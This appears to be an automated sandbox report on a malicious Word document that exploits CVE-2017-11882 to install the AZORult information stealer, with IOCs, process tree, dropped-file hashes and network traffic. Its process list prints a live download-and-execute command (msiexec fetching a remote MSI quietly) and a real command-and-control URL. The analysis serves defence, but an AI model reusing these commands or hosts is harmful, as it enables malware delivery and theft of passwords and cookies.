analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Bunker Requsition Nov 2018.doc

Full analysis: https://app.any.run/tasks/3ea1b7c1-ffb0-4f43-9329-5454d7d9301f
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Malware Trends Tracker     >>>
Analysis date: November 14, 2018, 07:51:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
exploit
CVE-2017-11882
rat
azorult
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

C6F7F7A26D6D6B0A15902E1846ABAC8D

SHA1:

4AE01713F4596D67F1185C3F767C0F5B43089855

SHA256:

CC80949E976B515B4285A69866000442441B54A9EF56F75DB6DCF562277B0BA8

SSDEEP:

768:QmKfcZpEHUqUisx+NLBhoY52330zUUaxCbG8ibUBvlk4oYhCkt:Q4ZcUisxYtBmWHv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3132)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 356)

    • AZORULT was detected

      • MSI3E30.tmp (PID: 3248)

    • Connects to CnC server

      • MSI3E30.tmp (PID: 3248)

    • Actions looks like stealing of personal data

      • MSI3E30.tmp (PID: 3248)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3904)

    • Downloads executable files from IP

      • msiexec.exe (PID: 3904)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3132)
      • MSI3E30.tmp (PID: 3248)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3904)
      • MSI3E30.tmp (PID: 3248)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3904)

    • Creates files in the user directory

      • MSI3E30.tmp (PID: 3248)

    • Reads the cookies of Mozilla Firefox

      • MSI3E30.tmp (PID: 3248)

    • Reads the cookies of Google Chrome

      • MSI3E30.tmp (PID: 3248)

  • INFO

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3904)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3708)

    • Application was crashed

      • EQNEDT32.EXE (PID: 3132)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3708)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3904)

    • Application was dropped or rewritten from another process

      • MSI3E30.tmp (PID: 3248)

    • Loads dropped or rewritten executable

      • MSI3E30.tmp (PID: 3248)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe #AZORULT msi3e30.tmp cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3708"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bunker Requsition Nov 2018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3132"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
356cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/6.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3092msiexec.exe /i http://34.244.180.39/6.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3904C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3248"C:\Windows\Installer\MSI3E30.tmp"C:\Windows\Installer\MSI3E30.tmp
msiexec.exe
User:
admin
Company:
Tencent Inc.
Integrity Level:
MEDIUM
Description:
Chartered Landscapes Ae Gilder Versions 8d
Exit code:
0
Version:
4.5.5.9
2416"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "MSI3E30.tmp"C:\Windows\system32\cmd.exeMSI3E30.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2572C:\Windows\system32\timeout.exe 3 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 634
Read events
926
Write events
0
Delete events
0

Modification events

No data
Executable files
50
Suspicious files
2
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR30A0.tmp.cvr
MD5:
SHA256:
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFE6AF5A96A9B34C23.TMP
MD5:
SHA256:
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3904msiexec.exeC:\Windows\Installer\183c69.ipibinary
MD5:3A6677D56F31F052D4DF533D60A5B5D4
SHA256:329CAD29E2F5D6AD9B730A1AFF870F6E5E35CFC4F524FDBDE90E0AC2B8B76172
3904msiexec.exeC:\Windows\Installer\MSI394B.tmpexecutable
MD5:1256D7CB23A836621FF65EBA394A8E08
SHA256:96959B79935BF934721DE19C49B45E8313478B98EC40DC9618B66FAB5C284B94
3708WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
3904msiexec.exeC:\Windows\Installer\MSI3E30.tmpexecutable
MD5:CC16722F6EFDFD82B5E064991813326E
SHA256:8E2EF1F52924B49E18F3CAC42784D32AE520DE179ACD4315A31030B02C54EF40
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$nker Requsition Nov 2018.docpgc
MD5:B0C593DDD37D9154F64DA86BABDAFA8F
SHA256:167746932076E39BC136FFC4BC37044CD86CAD809337C4C0DE0D8E3F534AFD88
3904msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3904msiexec.exeC:\Windows\Installer\MSI3D24.tmpbinary
MD5:24C7064EA9405C5BF1369A448D7CBC7A
SHA256:28C1B9ED0FEC23627E8335E11B0F09E4B70D79FD1011B814C3C624CA36F14F1D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3904
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/6.msi
IE
executable
708 Kb
suspicious
3248
MSI3E30.tmp
POST
200
103.63.2.245:80
http://slimiyt.us/madteri/index.php
HK
binary
4.27 Mb
malicious
3248
MSI3E30.tmp
POST
200
103.63.2.245:80
http://slimiyt.us/madteri/index.php
HK
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3248
MSI3E30.tmp
103.63.2.245:80
slimiyt.us
Guochao Group limited
HK
suspicious
3904
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious

DNS requests

Domain
IP
Reputation
slimiyt.us
  • 103.63.2.245
malicious

Threats

PID
Process
Class
Message
3904
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3904
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3904
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3904
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3248
MSI3E30.tmp
A Network Trojan was detected
ET TROJAN AZORult Variant.4 Checkin M2
3248
MSI3E30.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
3248
MSI3E30.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult HTTP Header
3248
MSI3E30.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult encrypted PE file
3248
MSI3E30.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult HTTP Header
3248
MSI3E30.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Bunker Requsition Nov 2018.doc